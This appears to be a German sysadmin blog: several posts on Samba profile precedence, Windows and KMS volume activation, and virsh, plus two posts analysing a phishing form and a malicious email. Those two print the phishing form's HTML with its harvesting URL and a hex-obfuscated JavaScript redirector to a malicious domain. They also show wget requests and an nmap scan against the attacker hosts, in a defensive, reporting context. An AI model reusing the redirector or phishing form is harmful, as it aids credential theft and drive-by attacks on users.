Windows Profile – Reihenfolge – Präzedenz – Default User Vista.V2

Ich habe mir heute die Frag gestellt, wie Windows Profile für neue Benutzer angelegt werden und nach welchem Muster bzw. welcher Grundlage in einer Samba-Domänenumgebung.

Über die letzten Jahre hinweg, gab es mehrere Windows-Versionen – alle mussten in irgendeiner Weise benannt werden:

Win2k -> Windows 2000
WinXP -> Windows XP, alle Servicepacks
WinNT -> Windows NT
Win2K3 -> Windows 2003
Vista -> Windows Vista erste Version
Vista.V2 ->Windows Vista zweite Version und Windows 7/Windows 8

Vista.V4 für Windows ab Version 8.1 (Quelle: https://wiki.samba.org/index.php/Samba_%26_Windows_Profiles)

Samba verwendet intern folgende Variable:

       %a
The architecture of the remote machine. It currently recognizes Samba (Samba), the Linux CIFS file
system (CIFSFS), OS/2, (OS2), Mac OS X (OSX), Windows for Workgroups (WfWg), Windows 9x/ME (Win95),
Windows NT (WinNT), Windows 2000 (Win2K), Windows XP (WinXP), Windows XP 64-bit(WinXP64), Windows 2003
including 2003R2 (Win2K3), and Windows Vista (Vista). Anything else will be known as UNKNOWN.

Meldet sich jetzt der Benutzer “max” mit seiner Workstation, die in der Domäne integriert ist an dieser an, wird in folgender Reihenfolge das Profil geprüft und wenn nötig erstellt:

1. Gibt es für den anzumeldenden Benutzer “max” unter C:\Users\max bereits ein lokales Profil, wird auf dem Samba-Server im Profilpfad geprüft, ob dort ein severgespeichertes Profil für den Benutzer “max” liegt.

2. Liegt dort ein Profil, wird dieses nach C:\Users\max kopiert

2. Hat der Benutzer noch kein lokales Profil und liegt auf dem Samba-Server auch noch kein Benutzerprofil gespeichert, handelt es sich um eine Erstanmeldung. Es wird in der Netlogon-Freigabe auf dem Server geprüft, ob es einen Ordner in der Form “Default User.v2″ gibt. Dies wird als Vorlage verwendet und nach C:\Useres\max kopiert

3. Gibt es im Netlogon-Share kein Default-Profil, erhält der Benutzer ein lokales Default-Profil von C:\Users\Default.

Möchte man also alle seine Benutzer mit einem Default-Profil versorgen, welches für alle gleich aussieht, kopiert man entweder ein lokal angepasstes Profil in den netlogon\Default User.v2 Ordner oder man passt das lokale-Profil Default an und sorgt dafür, dass dieses auf allen Arbeitsplätzen immer gleich ist.

Telefonische Windows-Aktivierung – nicht von Mobilfunk erreichbar

Microsoft ich hasse euch. Neuerdings blockt ihr eure telefonische Aktivierung über die frankfurter Festnetznummer für Anrufer aus dem Mobilfunk.

Mit #31# Nummer konnte ich mit unterdrückter jedoch die Aktivierung abschließen. Macht nur weiter so, irgendwann vergrault ihr auch den letzten Anwender.

Win7 – Unattend.xml – ProductKey – KMS-Server

Verwendet man einen KMS-Server zur Aktivierung von Volumen Lizenzen, muss dennoch in der Unattend.xml ein ProductKey hinterlegt werden.

Microsoft stellt die Schlüssel zur Verfügung unter:

http://technet.microsoft.com/en-us/library/jj612867.aspx

Fehlt der Key, gibts eine Fehlermeldung ala:

2014-04-15 23:04:27, Error                        [Shell Unattend] ProductKey: ” installation failed (0×80070057)
2014-04-15 23:04:27, Info                         [Shell Unattend] Exiting ‘specialize’ pass with status 0×80070057

in der C:\Windows\Panther\setupact.log

Das führt natürlich wie gewohnt zu einer völlig anderen Fehlermeldung in der GUI in der Form:

 

Mehr von diesem Beitrag lesen

Microsoft Windows 7 unattended Installation – Sysprep

c:\Windows\Panther\

Ich dachte erst ein weiteres Spiel aus der Reihe Pinball und Solitaire von Microsoft.

Nein in diesem Pfad kann für eine Windows-Installation eine XML-Konfiguration namens “Unattend.xml” abgelegt werden.

Bei der Installation eines Windows-7 Systems, wird diese Datei dann ausgewertet. Sowas wie preseed für Linux.

Da sich hier jedoch scheinbar regelmäßig das Format ändert, muss ständig nachjustiert werden. Mit dieser Datei kann man z.B. auch einen neuen Client automatisch in die Domäne fahren.

Wichtig zu erwähnen ist noch, dass man vor dem Clonen/Zurücksichern einer Installation unbedingt das Tool sysprep (C:\/windows/system32/sysprep/sysprep.exe) ausführen sollte.

Das sorgt dafür, dass eindeutige zu einer Maschine gehörende Informationen bereinigt werden – VOR DEM CLONEN! – welche sich sonst sperren könnten.

Microsoft kann das aber alles viel schöner formulieren und so verweise ich aufs Technet…

http://technet.microsoft.com/de-de/library/cc766514%28v=ws.10%29.aspx

Windows 7 KMS – Aktivierung von Volumenlizenz – Win7 / Office 2013

Es gibt zwei große Möglichkeiten, wie man Microsoft-Produkte aktiviert. Entweder man stellt sich einen KMS (Key Management Server) – die Funktion verdient eigentlich nicht die Bezeichnung Server oder man aktiviert jedes Produkt einzeln telefonisch oder online.

Die Einzelaktivierung kann verwendet werden, wenn man z.B. 25 Lizenzen für Server 2012 erwirbt, und diese Stück für Stück verbraucht. Das ist die gewohnte Aktivierung, die man von seiner Windows-Installation kennt.

Die Zweite mit einem KMS-Server ist vollautomatisch – wenns mal läuft.

Die Clients müssen mit mit einem passenden Medium für KMS-Aktivierung installiert worden sein.

Der KMS-Server kann ein Win7 Prof (mit Volumenlizenz) oder etwas Neueres sein.

Der KMS-Server benötigt https-Zugriff ins Internet und muss von den Clients auf port 1688/tcp erreicht werden.

Die eigentliche Konfiguration des KMS-Servers auf dem Win7 Rechner sind 2 Zeilen :)

slmgr.vbs /ipk kms-lizenzkey-vom-distributor-oder-softwarelieferant (z.B. abcde-fghij-12345…)

Damit wird die Volumenlizenz auf dem KMS aktivierung steht für Clients, die aktiviert werden sollen zur Verfügung.

Aktivierung des eigenen Systems im Anschluss per KMS mit Volumenlizenz:

slmgr.vbs /ato

Jetzt ist lediglich noch ein DNS-Eintrag erforderlich, denn die Clients machen einen SRV-Lookup auf einen speziellen Eintrag und landen so beim KMS:

Name Setting
Name _vlmcs._tcp
Type SRV
Priority 0
Weight 0
Port 1688
Hostname FQDN of KMS Host

 

Häufig wie so oft üblich, kann der KMS einen Neustart vertragen, bevor er überhaupt etwas tut.

Achtung! Die Clients werden erst aktiviert, wenn eine gewisse Anzahl an Clients zusammen gekommen sind.

Es müssen mindestens 25 Aktivierungen anstehen, damit der KMS-Server sich bemüht und beginnt, zu aktivieren…

Alles in allem ein verdammter sch… Aufwand, um ein Softwareprodukt zu aktivieren.

 

Quelle:

http://technet.microsoft.com/en-us/library/ff793405.aspx

http://technet.microsoft.com/en-us/library/ff793416.aspx

 

Microsoft Lizenzwahnsinn – KMS – MAK – Office 2013 – Windows 7

Ich glaub mich trifft der Schlag. Ab Windows Vista, gibt es keine “Flatrate” Lizenzschlüssel als Volumenlizenzen mehr. Das heißt, auch wenn Firma X für viel Geld eine Volumenlizenz kauft um mit einem Schlüssel 1000 PCs zu installieren, die Aktivierung der Installation noch völlig unabhängig davon ist.

 

Nach der Installation bleibt die Aktivierung mit einem Schlüssel auf jedem Rechner – dies ist die MAK Variante.

 

Die zweite Möglichkeit ist, einen Key Management Server zu installieren (KMS).

Dies kann Windows 7 Prof. mit Volumen-LIzenz sein. Damit lässt sich das Win7 + Office 2013 aktivieren.

 

virsh – kvm – CD Laufwerk einbinden

root@vm-server1:/etc/libvirt# virsh attach-disk oss /dev/sr0 hdc –type cdrom –mode readonly
Disk attached successfully

 

Die CD die durchgereicht wird an den Gast “oss” liegt im echten Laufwerk auf dem Server (/dev/sr0)

Phishing-Angriff – Trickreicher Webserver

Und noch ein Beitrag, weils so spannend ist:

Die üblichen Phishing-Mails kennt ja jeder.

Visa-Kreditkartendaten in Formular eingeben, abschicken und wer anders freut sich:

In meinem Fall ist im HTML-Code der Verweis auf:

<form name=”frm” action=”http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php&#8221; method=”post” onsubmit=”return valFrm()”><table id=”formTable”><tr><td colspan=”2″><span id=”title”>Reactivate the Verified by Visa/Mastercard service.</span>

 

Auch hier wieder gekaperte Domain von polnischer Firma übernommen. Das spannende hier ist jedoch, dass der Server egal ob mit get/post nachdem wir die Daten abgeliefert haben, einen redirect auf die offizielle Visa-Seite liefert. So sieht das ganze auf den ersten Blick täuschend echt aus…

stefan@wrk1:~$ wget http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
–2014-04-12 11:50:28– http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
Resolving fabrykaperspektyw.pl (fabrykaperspektyw.pl)… 77.55.2.176
Connecting to fabrykaperspektyw.pl (fabrykaperspektyw.pl)|77.55.2.176|:80… connected.
HTTP request sent, awaiting response… 302 Found
Location: http://usa.visa.com/personal/cards/index.html [following]
–2014-04-12 11:50:28– http://usa.visa.com/personal/cards/index.html
Resolving usa.visa.com (usa.visa.com)… 92.122.25.100
Connecting to usa.visa.com (usa.visa.com)|92.122.25.100|:80… connected.

Nachdem wir auch hier den Hoster informiert haben, hinterlassen wir noch eine Info in deren Logs:

stefan@wrk1:~$ wget -d –post-data ‘you=have_been_reported’ http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
Setting –post-data (postdata) to you=have_been_reported
DEBUG output created by Wget 1.13.4 on linux-gnu.

URI encoding = `UTF-8′
–2014-04-12 12:07:07– http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
Resolving fabrykaperspektyw.pl (fabrykaperspektyw.pl)… 77.55.2.176
Caching fabrykaperspektyw.pl => 77.55.2.176
Connecting to fabrykaperspektyw.pl (fabrykaperspektyw.pl)|77.55.2.176|:80… connected.
Created socket 3.
Releasing 0x00000000009aed70 (new refcount 1).

—request begin—
POST /modules/mod_zetta/auth.php HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: fabrykaperspektyw.pl
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

—request end—
[POST data: you=have_been_reported]

 

Angriff per E-Mail – eine kleine Analyse

Heute ist mal wieder eine Mail aufgeschlagen mit einem Betreff von:

Your video has been queued and will be processed as soon as possible

 

Und einem Link zu:

XXXX://securytec.de/cgi-bin/nonextensible.pl

Was hier auffällt ist schon mal eine übernommene deutsche Domain, die als Dreckschleuder genutzt wird.

Eingetragener Eigentümer bei denic ist ein bayrischer Unternehmer.

Diesen habe ich informiert per Telefon.

 

Hinter dem Perl-Skript verbirgt sich verschleierter Code in der Form:

<html><body><script type=”text/javascript”>vgy1=”\x30″;kuv2=”\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x71\x67\x73\x72\x6E\x78\x73\x2E\x63\x6F\x6D”;setTimeout(“\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x6B\x75\x76\x32\x3B”,vgy1);</script></body></html>

Wandelt man Hex in Ascii um, lädt der Code

XXXX://oqgsrnxs.com/

Hinter dieser Domain existiert ein A-Eintrag

oqgsrnxs.com. 568 IN A 91.200.12.11

Hinter der IP 91.200.12.11 verbirgt sich der ukrainische Hoster hidehost.net. Port 80 ist jedoch momentan geblockt. Der Server läuft aber noch:

Starting Nmap 6.00 ( http://nmap.org ) at 2014-04-12 11:31 CEST
Nmap scan report for dedic384.hidehost.net (91.200.12.11)
Host is up (0.11s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp filtered http
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds

Es könnte auch sein, dass damit nur spezielle Hosts angegriffen werden sollen, und meine Absender-IP (deutschen Ursprungs) nicht erlaubt ist.

Auch der Hoster hidehost.net wurde informiert.

Zarafa 7.1 – zarafa-admin jetzt im Paket zarafa-utils statt zarafa-admin…

Follow

Erhalte jeden neuen Beitrag in deinen Posteingang.